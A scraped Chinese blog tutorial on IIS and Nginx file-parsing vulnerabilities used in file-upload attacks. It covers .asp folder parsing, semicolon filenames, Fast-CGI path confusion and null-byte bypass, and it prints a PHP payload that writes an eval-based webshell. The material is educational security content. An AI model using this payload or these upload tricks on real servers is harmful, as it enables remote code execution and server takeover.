2. 程式人生 > >51. 檔案上傳篇——IIS解析漏洞原理

51. 檔案上傳篇——IIS解析漏洞原理

阿新 發佈:2019-02-02

目錄解析

當建立“*asp、*asa”格式的資料夾時,其目錄下的任意檔案都將會被IIS當做ASP檔案來解析。

例如:建立資料夾parsing.asp,在parsing.asp資料夾下新建一個文字檔案test.txt,其內容為<%=now()%>,然後在瀏覽器中訪問,會發現test.txt會被當做ASP檔案執行,在瀏覽器頁面輸出當前時間!

檔案解析

當檔案為“.asp;1.jpg”時,分號後面的不被解析。IIS6.0同樣會以ASP指令碼方式來執行!

例如:建立檔案test.asp;1.jpg,內容為<%=now()%>,將會在瀏覽器頁面輸出當前時間。

IIS 7.0/7.5/Nginx<8.3畸形解析漏洞

Nginx解析漏洞是我國安全組織80sec發現的!

在預設Fast-CGI開啟的狀況下,黑客上傳一個名字為wooyun.jpg,內容為

<?php fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd]?)’);?>

的檔案,然後訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬shell.php

Nginx<8.03空位元組程式碼執行漏洞

影響版本:0.50.6,0.7<=0.7.65,0.8<=0.8.37

Nginx在圖片中嵌入PHP程式碼然後通過訪問 xxx.php%00.jpg 來執行其中的程式碼

相關推薦

51. 檔案——IIS解析漏洞原理

目錄解析當建立“*asp、*asa”格式的資料夾時,其目錄下的任意檔案都將會被IIS當做ASP檔案來解析。例如:建立資料夾parsing.asp,在parsing.asp資料夾下新建一個文字檔案test.txt,其內容為<%=now()%>,然後在瀏覽器中訪問,會

50. 檔案——檔案漏洞原理

檔案上傳漏洞 檔案上傳漏洞是WEB安全中經常利用到的一種漏洞形式。這種型別的攻擊從大的型別上來說是攻擊“資料與程式碼分理原則”的一種攻擊。 一些web應用程式中允許上傳圖片,文字或者其他資源到指定的位置,檔案上傳漏洞就是利用這些可以上傳的地方將惡意程式碼植入到伺服器中,再

Spring Test之檔案

Spring Test之檔案上傳篇 1、上傳需要的簡單配置 1.1 匯入依賴包,包含檔案上傳、springtest4+和Junit4+包 <dependency> <groupId>org.springframework</groupId&

Excel檔案伺服器並解析存入資料庫的整套過程(2003--2013都可試)

執行環境搭建:     JDK1.6.0     MyEclipse 6.5     Linux伺服器 所需jar包:用積分到我的資源下載 java程式碼:  ReadExcel03Util.java package com.rapoo.excelToDB; import

檔案漏洞 --- IIS、Apache、Nginx 檔案解析漏洞

解析漏洞:將格式進行變換解析 解析條件:1.搭建平臺 2.命名規則 iis apache uginx iis6.0 檔案正常地址: 觸發漏洞地址: 資料夾正常地址: 觸發漏洞地址: iis7.x uginx Apache(向上

解析導致的檔案漏洞

解析導致的上傳漏洞 1.IIS6.0站上的目錄路徑檢測解析繞過上傳漏洞 預設 遇到/就不解析後面的了 IIS6.0目錄路徑檢測解析,檔案的名字為“*.asp/xxx.jpg”,也同樣會被 IIS 當作 ASP檔案來解析並執行 首先我們請求 /aaa.

文字檔案漏洞[任意.繞過.解析]

首先我們來普及一下幾個知識點,嘿嘿!! 什麼是檔案上傳漏洞? 檔案上傳漏洞是指由於程式設計師在對使用者檔案上傳部分的控制不足或者處理缺陷,而導致的使用者可以越過其本身許可權向伺服器上上傳可執行的動態指令碼檔案。這裡上傳的檔案可以是木馬,病毒,惡意指令碼或者WebShell等。這種攻擊方式是

檔案解析漏洞

上傳漏洞 Mirror王宇陽 2019年10月28日 Web網站通常存在檔案上傳(例如:圖片、文件、zip壓縮檔案^等)只要存在上傳功能,就有可能會有上傳漏洞的危機。和SQL注入漏洞相比較而言,上傳漏洞更加危險,因為該漏洞可以直接上傳一個WebShell到伺服器上。 解析漏洞 利用上傳漏洞,通常需要結合W

17.[CVE-2017-12615]Tomcat任意檔案漏洞

【CVE-2017-12615】 Tomcat任意檔案上傳漏洞 首先先貼出wooyun上的一個案例:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html 看到這個漏洞讓我想到了IIS6.0任意檔案上傳的漏洞,不過現在大多都用工具,比如I

檔案漏洞繞過技巧

檔案上傳漏洞繞過技巧 一、檔案上傳漏洞介紹   通常web 站點會有使用者註冊功能,而當用戶登入之後大多數情況下都會存在類似頭像上傳、附件上傳一類的功能,這些功能點往往存在上傳驗證方式不嚴格的安全缺陷,是在web 滲透中非常關鍵的突破口,只要經過仔細測試分析來繞過上傳驗證機制,往往會造成被攻擊

Java且後臺解析XML檔案

後臺程式碼: import java.io.BufferedReader; import java.io.ByteArrayInputStream; import java.io.InputStream; import java.io.InputStreamReader; import javax.

SpringMVC:轉發與重定向、圖片檔案、Json(jackson)

注意: 專案:war 和 專案:war  exploded 兩者並不同,idea  執行 專案:war  exploded   <dependency> <groupId>org.

fckeditor 2 6 4 任意檔案漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

第65 AJAX初識 校驗使用者名稱 登入示例 檔案 csrftoken

1, 知識儲備      2. AJAX的定義   非同步的JavaScript和XML   使用場景:     JavaScript和後端的資料傳遞   2.1原生的JavaScript實現AJAX   &nb

FCKeditor connector php任意檔案漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

web開發excel檔案解析

前言 在web開發的時候,我們經常有遇到檔案的上傳以及解析的需求,比如我們將excel檔案上傳並且解析,最後將解析的excel的內容插入到資料庫中,今天就實踐一下檔案的上傳以及excel的解析,這篇部落格主要是實踐檔案上傳功能,對應的excel檔案的解析,將在下一篇部落格實踐。 準備工作:

web開發excel檔案解析(下)

前言: 接著上一篇部落格檔案上傳,這一篇部落格實踐的是excel檔案的解析,通常我們會需要這樣的需求,就是讓使用者下載一個格式的模板,然後在模板中按照要求填寫資料,最後的就是將excel中的內容全部儲存到資料庫中,從而實現一種批量的上傳的作用,節省很多時間。 準備工作: 要實現excel

檔案漏洞例項

下面例項都是在墨者學院靶場做的,幾種常見的上傳姿勢 1.結合iis5.x/6.0解析漏洞上傳檔案 先上傳一個asp檔案,抓包看看返回結果是什麼   由上圖我們可以知道伺服器是iis6.0,接下來我們利用iis6.0解析漏洞來上傳我們的一句話,新增一個asp目錄  

Web安全_檔案漏洞_DVWAshell+中國菜刀管理檔案

遠端登陸靶機: 開啟kali命令列 ssh 賬號@地址 輸入密碼 成功連線 這時就可以輸入命令對靶機進行操作,如檢視、刪除檔案、進入目錄等等 如這裡進入靶機裡DVWA上傳檔案目錄處檢視所上傳的檔案: 可以檢視到有四個檔案,可以進行刪除(這裡刪除php字尾的檔

web安全(6)-- 檔案漏洞

1.1 漏洞描述     上傳漏洞這個顧名思義,就是攻擊者通過上傳木馬檔案,直接得到WEBSHELL,危害等級超級高,現在的入侵中上傳漏洞也是常見的漏洞。     導致該漏洞的原因在於程式碼作者沒有對訪客提交的資